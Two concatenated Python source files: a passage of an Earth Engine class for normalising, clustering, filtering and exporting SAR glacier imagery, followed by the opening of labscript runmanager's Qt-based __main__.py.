if isinstance(image, ee.Image):
bands = image.bandNames().getInfo()
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
bands = image[0].bandNames().getInfo()
elif isinstance(image, list):
bands = image[0].bandNames().getInfo()
else:
raise TypeError('image arg must be ee.Image, ee.ImageCollection, list')
if isinstance(band, int):
selected_band = bands[band]
elif isinstance(band, str):
selected_band = band
else:
raise TypeError('band arg must be int, str')
aoi = self.get_aoi()
def normalize(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
image_band = image.select(selected_band)
rest = image.select([bnd for bnd in bands if bnd != selected_band])
if band_range:
if len(band_range) != 2:
raise ValueError('band_range should be a list of two values')
mini = band_range[0]
maxi = band_range[1]
image_band = image_band.clamp(mini, maxi)
else:
scale = image_band.projection().nominalScale().getInfo()
if scale > 100:
scale = 10
min_max_dict = image_band.reduceRegion(
ee.Reducer.minMax(),
aoi,
crs='EPSG:3031',
scale=scale,
maxPixels=10e12
)
mini = ee.Number(min_max_dict.get('{}_min'.format(selected_band)))
maxi = ee.Number(min_max_dict.get('{}_max'.format(selected_band)))
normalized = image_band.unitScale(mini, maxi)
merged = ee.Image([normalized, rest])
return merged.set('system:index', system_index)
if isinstance(image, ee.Image):
return normalize(image)
return list(map(normalize, image))
def cluster(self, image, compactness=0, mapfilter=True):
"""
(Warning): MUST be done AFTER normalization
(Warning: removes the angle band)
Data is scaled to 0-255.
Clusters an image or images using the Google Earth Engine Algorithm \
SNIC algorithm
Parameters:
images (ee.Image, ee.ImageCollection, list): Image/images to create clusters on
compactness (int): Number representing the approximate size of clusters
mapfilter (bool): If enabled, will filter the images before clustering
Returns:
clustered (same as images): The image/images with these bands:
- clusters (unique ID/cluster)
- radar_data_mean (per cluster, of the original image's first non-angle band)
- original first non-angle band
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
print('Starting clustering...')
if mapfilter:
image = self.mapfilter(image)
def map_cluster(image):
image = ee.Image(image)
coordinates = image.get('system:footprint').getInfo()['coordinates']
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
SNIC = ee.Algorithms.Image.Segmentation.SNIC(
image, **{'compactness': compactness,
'connectivity': 8,
'size': 20})
SNIC_bands_removed = SNIC.select([band for band in SNIC.bandNames().getInfo()
if band != 'angle_mean' and band != 'angle'
and band != 'labels' and band != 'seeds'])
SNIC_bands_removed = ee.Image([SNIC_bands_removed, image])
if not SNIC_bands_removed.get('Int32').getInfo():
SNIC_bands_removed = SNIC_bands_removed.multiply(255).toInt32().set('Int32', True)
return SNIC_bands_removed.set('system:index', system_index).set('system:footprint', coordinates)
def remove_angle(image):
bands_angle_removed = image.bandNames().filter(
ee.Filter.neq('item', 'angle'))
return image.select(bands_angle_removed)
if isinstance(image, ee.Image):
image = remove_angle(image)
clustered = map_cluster(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
clustered = list(map(map_cluster, image))
elif isinstance(image, list):
clustered = list(map(map_cluster, image))
print('Clustering done')
return clustered
def mapfilter(self, image, use_filter='gammamap'):
"""
Applies a filter to the image argument. List of implemented filters:
- lowpass1
- lowpass2
- highpass1
- highpass2
- frost (as in https://www.imageeprocessing.com/2018/06/frost-filter.html)
- gammamap (as in Lopes A., Nezry, E., Touzi, R., and Laur, H., 1990.)
Parameters:
image (ee.Image, ee.ImageCollection, list): The image/images to be \
filtered for speckle
use_filter (str): The filter to use for filtering
Returns:
filtered (same as image): The filtered image/images
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
use_filter = globals().get(use_filter)
def filt(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__') + f'_{use_filter.__name__}'
return use_filter(image).set('system:index', system_index)
if isinstance(image, ee.Image):
filtered = filt(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
filtered = list(map(filt, image))
elif isinstance(image, list):
filtered = list(map(filt, image))
return filtered
def disp(self, image, rgb=False, band=0):
"""
Displays an image in rgb/grayscale folium map fashion
Parameters:
image (ee.Image): The image to display
rgb (bool): Whether or not to display in rgb corresponding to
band (int): Selects which band to display if rgb is set to False. \
Defaults to 0.
Returns:
None.
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
location = self.get_aoi().centroid().coordinates().getInfo()[::-1]
# folium doesn't support crs other than crs 4326
fmap = folium.Map(location=location, zoom_start=12)
bands = image.bandNames().getInfo()
if rgb:
try:
blue = image.select('elevation')
blue.bandNames().getInfo()
except:
blue = image.select(bands[0]).divide(image.select(bands[1]))
rgb = ee.Image.rgb(image.select(bands[0]),
image.select(bands[1]), blue)
fmap.add_ee_layer(rgb, {'min': [0, 0, 0], 'max': [1, 1, 200]}, name='Image')
fmap.add_child(folium.LayerControl())
display(fmap)
else:
fmap.add_ee_layer(image.select(bands[band]), {'min': 0, 'max': 1}, name='Image')
fmap.add_child(folium.LayerControl())
display(fmap)
def download(self, image, scale, cloud_bucket, directory, to_disk=True, tryReduce=False,
withbandsfile=False):
"""
Downloads either an image or an image collection to a directory.
(note: I couldn't get geemap to download singular images, but
I also couldn't get Google EE to download multiple images. In the end,
I decided to download singular images to the local directory, but
python lists of images or ee.ImageCollection will be saved to
the glaciers_ee bucket in Google Cloud Platform)
Parameters:
images (list): a list of images to export to cloudstorage
scale (int): the scale in meters/pixel to download the images at
cloud_bucket (str): The cloud bucket to temporarily upload the images to
directory (str): the subdirectory to download the images to in the \
glaciers_ee bin. Defaults to 'export'
to_disk (bool): If set to True, the images will proceed to download to \
disk. Defaults to True
tryReduce (bool): If set to True, if the images fail for any reason, \
the reduction algorithm will attempt to split the image into smaller segments
Returns:
None.
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
if isinstance(image, ee.Image):
print('When the images are finished uploading, they will be avaiable at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
batchExport([image], scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
elif isinstance(image, list):
print('When the images are finished uploading, they will be avaiable at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
batchExport(image, scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
elif isinstance(image, ee.ImageCollection):
print('When the images are finished uploading, they will be avaiable at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
aslist = eeICtolist(image)
batchExport(aslist, scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
def hist(self, image, band=0):
"""
Creates the values for an intensity histogram of an image.
Parameters:
image (ee.Image): The image to calculate the histogram for
band (int): The band to calculate the pixel intensities for
Returns:
hist (list): The histogram created
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
aoi = self.get_aoi()
bands = image.bandNames()
band_max = image.select(band).reduceRegion(ee.Reducer.max(),
aoi, crs='EPSG:3031', scale=100)
maxi = ee.Number(band_max.get(bands.get(band))).getInfo()
if maxi >= 2:
print("Warning: the image may not haven been properly normalized.",
"The image should be renormalized before creating a histogram")
hist = image.select(band).reduceRegion(ee.Reducer.fixedHistogram(0, 1, 500),
aoi).get(bands.get(band)).getInfo()
return hist
def get_stats(self, image, band=0):
"""
Grabs common statistics about and image's specified band including \
mean, variance, and skew.
Parameters:
image (ee.Image): The image to grab stats about
band (int): The band to make calculations about of the image
Return:
stats (dict): A dictionary containing statistics about the image band.
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
bands = image.bandNames().getInfo()
if isinstance(band, int):
stats = {}
stats['mean'] = image.select(bands[band]).reduceRegion(ee.Reducer.mean(),
self.get_aoi()).get(bands[band]).getInfo()
stats['variance'] = image.select(bands[band]).reduceRegion(ee.Reducer.variance(),
self.get_aoi()).get(bands[band]).getInfo()
stats['skew'] = image.select(bands[band]).reduceRegion(ee.Reducer.skew(),
self.get_aoi()).get(bands[band]).getInfo()
elif isinstance(band, str):
stats = {}
stats['mean'] = image.select(band).reduceRegion(ee.Reducer.mean(),
self.get_aoi()).get(band).getInfo()
stats['variance'] = image.select(band).reduceRegion(ee.Reducer.variance(),
self.get_aoi()).get(band).getInfo()
stats['skew'] = image.select(band).reduceRegion(ee.Reducer.skew(),
self.get_aoi()).get(band).getInfo()
return stats
def get_CM_stats(self, image, band=0, info_to_store=['contrast', 'corr', 'diss', 'ent', 'asm', 'idm', 'prom']):
"""
Grabs averaged statistics derivable from the co-occurrence matrix of
an image band. Data is scaled to 0-255. List of statistics returned:
- contrast (con)
- correlation (cor)
- dissimilarity (dis)
- entropy (ent)
- uniformity (uni) same as angular second moment (asm)
- inverse difference moment (idm)
Parameters:
image (ee.Image, ee.ImageCollection, or list): image/images to use
band (int or str): band to calculate CM stats on
bands_to_store (list): default list of texture data to return. can be
modified to limit return data
Returns:
CM_stats (same type as image): image/images with bands as listed above
"""
print('Starting CM_stats ...')
def CM(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__') + '__CMstats'
if isinstance(band, int):
bands = image.bandNames().getInfo()
bandname = bands[band]
bands_to_store = [bandname+'_'+store_bn for store_bn in info_to_store]
image_band = image.select(bandname)
if not image_band.get('Int32').getInfo():
image_band = image_band.multiply(255).toInt32().set('Int32', True)
GCM = image_band.glcmTexture()
CM_stats = GCM.select(bands_to_store).set('system:index', system_index)
nonlocal curr
curr += 1
print(f"{curr}/{m} CM_stats complete")
return CM_stats
if isinstance(image, ee.Image):
curr, m = (0, 1)
CM_stats = CM(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
curr, m = (0, len(image))
CM_stats = [CM(img) for img in image]
elif isinstance(image, list):
curr, m = (0, len(image))
CM_stats = [CM(img) for img in image]
else:
raise TypeError("image arg is not of ee.Image, ee.ImageCollection, or list type")
return CM_stats
def get_image_minMax(self, image):
# r10.reduceRegion(ee.Reducer.minMax(), raster10.get_aoi(), crs='EPSG:3031', scale=10, maxPixels=10e12).getInfo()
"""
Returns a dictionary of the mininium and maximum of each band
Parameters:
image (ee.Image): A single image
Returns:
minmax (dict): A dictionary containing the min, max values of each band
"""
minMax = image.reduceRegion(ee.Reducer.minMax(), self.get_aoi(),
scale=image.select(0).projection().nominalScale(),
maxPixels=10e12).getInfo()
return minMax
def pypeline(self, start_date, end_date, cloud_bucket,
directory, polarization='SH',
collection='COPERNICUS/S1_GRD_FLOAT', scale=50):
"""
This pipeline is a single command that will collect one image from every
month between start_date and end_date and download. The inbetween work is
done for the user. For more flexibility, consider manually collecting images.
Each image has these bands: cluster results, band_means
Parameters:
start_date (ee.Date, str): Start date of filtering in ISO format
end_date (ee.Date, str): End date of filtering in ISO format
Returns:
None
"""
one_per_images = self.one_per('month', collection=collection, start_date=start_date,
end_date=end_date, polarization=polarization)
normalized_images = self.normalize_band(one_per_images, band=0, band_range=[0, 500])
clustered_and_filtered = self.cluster(normalized_images)
textures = self.get_CM_stats(normalized_images, band=0)
self.download((clustered_and_filtered+textures), 30, cloud_bucket, directory)
class CustomCollection(Area):
"""
This is a subclass of the main class. Use it on importing images from \
Google Cloud Storage. Standard operations can be applied like
mapfilter and clustering.
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the files are stored
geeusername (str): your username to store the asset in the code editor
Methods:
- get_coords()
- get_aoi()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, cloud_bucket, directory, geeusername):
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
assets = []
def all_exists(blobs, directory):
command = f'earthengine ls users/{geeusername}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
output = pop.stdout.read().decode()
for blob in blobs:
ind = str(blob).find('/')
find = ' ' + directory
if str(blob)[ind-1:ind-len(find)-1:-1] != find[::-1]:
# if directory doesn't match, continue to next iter
continue
if str(blob)[ind:str(blob).find(',', ind)].strip() == '/':
# if blob is the actual directory and not a file, continue
continue
blob_info = str(blob).split(' ')
assetname = blob_info[2][blob_info[2].find('/')+1:-1]
if assetname.endswith('.tif'):
assetname = assetname[:-4]
assets.append(assetname)
if (geeusername + '/' + assetname) not in output:
return False
return True
if all_exists(blobs, directory):
assetlist = ['users/'+geeusername+'/'+assetname for assetname in assets]
self.eelist = [ee.Image(asset) for asset in assetlist]
else:
self.eelist = multicloudtoee(cloud_bucket, directory, geeusername)
geoJSON = geoJSONer(self.eelist[0].get('system:footprint').getInfo()['coordinates'])
super().__init__(geoJSON)
unbounded = [[[-180, -90], [180, -90], [180, 90], [-180, 90], [-180, -90]]]
if self.coords == unbounded:
new = [[[-179, -85],[179, -85],[179, 85],[-179, 85],[-179, -85]]]
self.coords = new
self.aoi = ee.Geometry.Polygon(self.coords, proj='EPSG:4326',
geodesic=False, evenOdd=True, maxError=1)
def get_coords(self):
"""
Gets the coordinates defined by the geoJSON.
Parameters:
None.
Returns:
self.coords (list): The coordinates defined by the geoJSON.
"""
return self.coords
def get_aoi(self):
"""
Gets the AOI defined by the coordinates.
Parameters:
None.
Returns:
self.aoi (list): The AOI defined by the coordinates.
"""
return self.aoi
def latest_img(self, threshold=80):
"""
Grabs the latest image in the given collection.
Parameters:
collection (str): A collection name from GEE's public collections data. \
Defaults to S1_GRD_FLOAT
Returns:
latest (ee.Image): The latest image for this area
"""
img_col = self.apply_filters()
eelist = img_col.toList(img_col.size())
latest = ee.Image(eelist.get(0)).clip(self.get_aoi())
return latest
def apply_filters(self, start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
earliest_first=False):
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
img_set = ee.ImageCollection(self.eelist)
sort = img_set.sort('system:time_start', opt_ascending=earliest_first)
return sort
def one_per(self, time_range, start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat())):
"""
Applies filters to create a LIST with one ee.Image per time_range.
Parameters:
time_range (str): day, month, or year. Specifies the approximate \
time range between photos.
start_date (ee.Date, str): Start date of filtering in ISO format
end_date (ee.Date, str): End date of filtering in ISO format
Returns:
collected_imgs (ee.ImageCollection): An image collection with the area
of geoJSON and the proper filters applied
"""
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
percent_missing = missing.divide(totalArea).getInfo()
return percent_missing
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
end_date_time = end_date
current_start_time = start_date
collected_imgs = []
while ee.Algorithms.If(
ee.Number.expression("x > 0", {
'x': end_date_time.difference(current_start_time, 'day')
}), 1, 0).getInfo():
(current_start_time, current_end_time) = (ee.Date(current_start_time)
.getRange(time_range).getInfo()['dates'])
img_col = self.apply_filters(start_date=current_start_time,
end_date=current_end_time, earliest_first=True)
try:
as_list = img_col.toList(img_col.size())
best = ee.Image(as_list.get(0)).clip(self.get_aoi())
pm_best = percent_missing(best)
for i in range(as_list.length().getInfo()):
latest = ee.Image(as_list.get(i)).clip(self.get_aoi())
pm_latest = percent_missing(latest)
if pm_latest < 0.01:
best = latest
pm_best = pm_latest
break
elif pm_latest < pm_best:
best = latest
pm_best = pm_latest
collected_imgs.append(best.clip(self.get_aoi()))
print('Selected an image for {}'
.format(ee.Date(current_start_time).format('YYYY-MM-dd').getInfo()))
except KeyboardInterrupt:
print('Canceled')
except:
print('There are no images in the',
time_range, "starting on",
ee.Date(current_start_time).format('YYYY-MM-dd').getInfo())
print('The best image had {:.2f}% pixels of data missing. \
Try selecting a smaller area.'.format(pm_best*100))
current_start_time = current_end_time
return ee.ImageCollection(collected_imgs)
class CustomImage(Area):
"""
This is a subclass of the main class. Use it on importing a singular image from \
Google Cloud Storage. Standard operations can be applied like \
mapfilter and segmentation.
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the files are stored
geeusername (str): your username to store the asset in the code editor
Methods:
- get_coords()
- get_aoi()
- get_image()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, cloud_bucket, directory, assetname, geeusername):
if assetname.endswith('.tif'):
assetname = assetname[:-4]
command = f'earthengine ls users/{geeusername}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
if (geeusername + '/' + assetname) not in pop.stdout.read().decode():
self.eeImage = cloudtoeecommand(cloud_bucket, directory,
assetname, geeusername)
else:
self.eeImage = ee.Image(('users/' + geeusername + '/' + assetname))
time.sleep(3)
geoJSON = geoJSONer(self.eeImage.get('system:footprint').getInfo()['coordinates'])
super().__init__(geoJSON)
def get_image(self):
return self.eeImage
def latest_img(self):
return self.get_image()
def apply_filters(self):
return ee.ImageCollection(self.get_image())
def one_per(self):
return [self.get_image(),]
# yay
|
__main__.py
|
#####################################################################
# #
# __main__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import print_function
import os
import sys
import errno
import labscript_utils.excepthook
import time
import contextlib
import subprocess
import threading
import Queue
import socket
import ast
import pprint
# Evaluation of globals happens in a thread with the pylab module imported.
# Although we don't care about plotting, importing pylab makes Qt calls. We
# can't have that from a non main thread, so we'll just disable matplotlib's
# GUI integration:
import matplotlib
matplotlib.use('Agg')
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.5', '3.0')
check_version('pandas', '0.13', '2')
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
import zprocess.locking
from zmq import ZMQError
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
import labscript_utils.shared_drive as shared_drive
import runmanager
from qtutils import inmain, inmain_decorator, UiLoader, inthread, DisconnectContextManager
from qtutils.outputbox import OutputBox
import qtutils.icons
# Set working directory to runmanager folder, resolving symlinks
runmanager_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runmanager_dir)
# Set a meaningful name for zprocess.locking's client id:
zprocess.locking.set_client_process_name('runmanager')
def log_if_global(g, g_list, message):
"""logs a message if the global name "g" is in "g_list"
useful if you want to print out a message inside a loop over globals,
but only for a particular global (or set of globals).
If g_list is empty, then it will use the hardcoded list below
(useful if you want to change the behaviour globally)
"""
if not isinstance(g_list, list):
g_list = [g_list]
if not g_list:
g_list = [] # add global options here
if g in g_list:
logger.info(message)
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runmanager.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runmanager']
set_appusermodel(window_id, appids['runmanager'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'runmanager', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
@contextlib.contextmanager
def nested(*contextmanagers):
if contextmanagers:
with contextmanagers[0]:
with nested(*contextmanagers[1:]):
yield
else:
yield
def scroll_treeview_to_row_if_current(treeview, item):
"""Checks to see if the item is in the row of the current item.
If it is, scrolls vertically to ensure that row is visible.
This is done by recording the horizontal scroll position,
then using QTreeView.scrollTo(), and then restoring the horizontal
position"""
horizontal_scrollbar = treeview.horizontalScrollBar()
existing_horizontal_position = horizontal_scrollbar.value()
index = item.index()
current_row = treeview.currentIndex().row()
if index.row() == current_row:
treeview.scrollTo(index)
horizontal_scrollbar.setValue(existing_horizontal_position)
class KeyPressQApplication(QtWidgets.QApplication):
"""A Qapplication that emits a signal keyPress(key) on keypresses"""
keyPress = Signal(int, QtCore.Qt.KeyboardModifiers, bool)
keyRelease = Signal(int, QtCore.Qt.KeyboardModifiers, bool)
def notify(self, object, event):
if event.type() == QtCore.QEvent.KeyPress and event.key():
self.keyPress.emit(event.key(), event.modifiers(), event.isAutoRepeat())
elif event.type() == QtCore.QEvent.KeyRelease and event.key():
self.keyRelease.emit(event.key(), event.modifiers(), event.isAutoRepeat())
return QtWidgets.QApplication.notify(self, object, event)
class FingerTabBarWidget(QtWidgets.QTabBar):
"""A TabBar with the tabs on the left and the text horizontal. Credit to
@LegoStormtroopr, https://gist.github.com/LegoStormtroopr/5075267. We will
promote the TabBar from the ui file to one of these."""
def __init__(self, parent=None, minwidth=180, minheight=30, **kwargs):
QtWidgets.QTabBar.__init__(self, parent, **kwargs)
self.minwidth = minwidth
self.minheight = minheight
self.iconPosition = kwargs.pop('iconPosition', QtWidgets.QTabWidget.West)
self._movable = None
self.tab_movable = {}
self.paint_clip = None
def setMovable(self, movable, index=None):
"""Set tabs movable on an individual basis, or set for all tabs if no
index specified"""
if index is None:
self._movable = movable
self.tab_movable = {}
QtWidgets.QTabBar.setMovable(self, movable)
else:
self.tab_movable[int(index)] = bool(movable)
def isMovable(self, index=None):
if index is None:
if self._movable is None:
self._movable = QtWidgets.QTabBar.isMovable(self)
return self._movable
return self.tab_movable.get(index, self._movable)
def indexAtPos(self, point):
for index in range(self.count()):
if self.tabRect(index).contains(point):
return index
def mousePressEvent(self, event):
index = self.indexAtPos(event.pos())
if not self.tab_movable.get(index, self.isMovable()):
QtWidgets.QTabBar.setMovable(self, False) # disable dragging until they release the mouse
return QtWidgets.QTabBar.mousePressEvent(self, event)
def mouseReleaseEvent(self, event):
if self.isMovable():
# Restore this in case it was temporarily disabled by mousePressEvent
QtWidgets.QTabBar.setMovable(self, True)
return QtWidgets.QTabBar.mouseReleaseEvent(self, event)
def tabLayoutChange(self):
total_height = 0
for index in range(self.count()):
tabRect = self.tabRect(index)
total_height += tabRect.height()
if total_height > self.parent().height():
# Don't paint over the top of the scroll buttons:
scroll_buttons_area_height = 2*max(self.style().pixelMetric(QtWidgets.QStyle.PM_TabBarScrollButtonWidth),
qapplication.globalStrut().width())
self.paint_clip = self.width(), self.parent().height() - scroll_buttons_area_height
else:
self.paint_clip = None
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
if self.paint_clip is not None:
painter.setClipRect(0, 0, *self.paint_clip)
option = QtWidgets.QStyleOptionTab()
for index in range(self.count()):
tabRect = self.tabRect(index)
self.initStyleOption(option, index)
painter.drawControl(QtWidgets.QStyle.CE_TabBarTabShape, option)
if not self.tabIcon(index).isNull():
icon = self.tabIcon(index).pixmap(self.iconSize())
alignment = QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter
tabRect.moveLeft(10)
painter.drawItemPixmap(tabRect, alignment, icon)
tabRect.moveLeft(self.iconSize().width() + 15)
else:
tabRect.moveLeft(10)
painter.drawText(tabRect, QtCore.Qt.AlignVCenter, self.tabText(index))
if self.paint_clip is not None:
x_clip, y_clip = self.paint_clip
painter.setClipping(False)
palette = self.palette()
mid_color = palette.color(QtGui.QPalette.Mid)
painter.setPen(mid_color)
painter.drawLine(0, y_clip, x_clip, y_clip)
painter.end()
def tabSizeHint(self, index):
fontmetrics = QtGui.QFontMetrics(self.font())
text_width = fontmetrics.width(self.tabText(index))
text_height = fontmetrics.height()
height = text_height + 15
height = max(self.minheight, height)
width = text_width + 15
button = self.tabButton(index, QtWidgets.QTabBar.RightSide)
if button is not None:
height = max(height, button.height() + 7)
# Same amount of space around the button horizontally as it has vertically:
width += button.width() + height - button.height()
width = max(self.minwidth, width)
return QtCore.QSize(width, height)
def setTabButton(self, index, geometry, button):
if not isinstance(button, TabToolButton):
raise TypeError('Not a TabToolButton, won\'t paint correctly. Use a TabToolButton')
result = QtWidgets.QTabBar.setTabButton(self, index, geometry, button)
button.move(*button.get_correct_position())
return result
class TabToolButton(QtWidgets.QToolButton):
def __init__(self, *args, **kwargs):
QtWidgets.QToolButton.__init__(self, *args, **kwargs)
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
paint_clip = self.parent().paint_clip
if paint_clip is not None:
point = QtCore.QPoint(*paint_clip)
global_point = self.parent().mapToGlobal(point)
local_point = self.mapFromGlobal(global_point)
painter.setClipRect(0, 0, local_point.x(), local_point.y())
option = QtWidgets.QStyleOptionToolButton()
self.initStyleOption(option)
painter.drawComplexControl(QtWidgets.QStyle.CC_ToolButton, option)
def get_correct_position(self):
parent = self.parent()
for index in range(parent.count()):
if parent.tabButton(index, QtWidgets.QTabBar.RightSide) is self:
break
else:
raise LookupError('Tab not found')
tabRect = parent.tabRect(index)
tab_x, tab_y, tab_width, tab_height = tabRect.x(), tabRect.y(), tabRect.width(), tabRect.height()
size = self.sizeHint()
width = size.width()
height = size.height()
padding = int((tab_height - height) / 2)
correct_x = tab_x + tab_width - width - padding
correct_y = tab_y + padding
return correct_x, correct_y
def moveEvent(self, event):
try:
correct_x, correct_y = self.get_correct_position()
except LookupError:
return # Things aren't initialised yet
if self.x() != correct_x or self.y() != correct_y:
# Move back! I shall not be moved!
self.move(correct_x, correct_y)
return QtWidgets.QToolButton.moveEvent(self, event)
class FingerTabWidget(QtWidgets.QTabWidget):
"""A QTabWidget equivalent which uses our FingerTabBarWidget"""
def __init__(self, parent, *args):
QtWidgets.QTabWidget.__init__(self, parent, *args)
self.setTabBar(FingerTabBarWidget(self))
def keyPressEvent(self, event):
if event.modifiers() & QtCore.Qt.ControlModifier:
if event.key() in (QtCore.Qt.Key_Tab, QtCore.Qt.Key_Backtab):
# We are handling ctrl-tab events at the level of the whole
# application, so ignore them here so as not to double up.
event.ignore()
return
return QtWidgets.QTabWidget.keyPressEvent(self, event)
def addTab(self, *args, **kwargs):
closeable = kwargs.pop('closable', False)
index = QtWidgets.QTabWidget.addTab(self, *args, **kwargs)
self.setTabClosable(index, closeable)
return index
def setTabClosable(self, index, closable):
right_button = self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide)
if closable:
if not right_button:
# Make one:
close_button = TabToolButton(self.parent())
close_button.setIcon(QtGui.QIcon(':/qtutils/fugue/cross'))
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, close_button)
close_button.clicked.connect(lambda: self._on_close_button_clicked(close_button))
else:
if right_button:
# Get rid of it:
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, None)
def _on_close_button_clicked(self, button):
for index in range(self.tabBar().count()):
if self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide) is button:
self.tabCloseRequested.emit(index)
break
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeview that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Also has modified tab and arrow key behaviour."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
self._ROLE_IGNORE_TABNEXT = None
self.setAutoScroll(False)
def setRoleIgnoreTabNext(self, role):
"""Tell the Treeview what model role it should look in for a boolean
saying whether to ignore the MoveNext cursor action. This will cause
cells marked as such to simply end editing when tab is pressed,
without starting editing on any other call."""
self._ROLE_IGNORE_TABNEXT = role
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
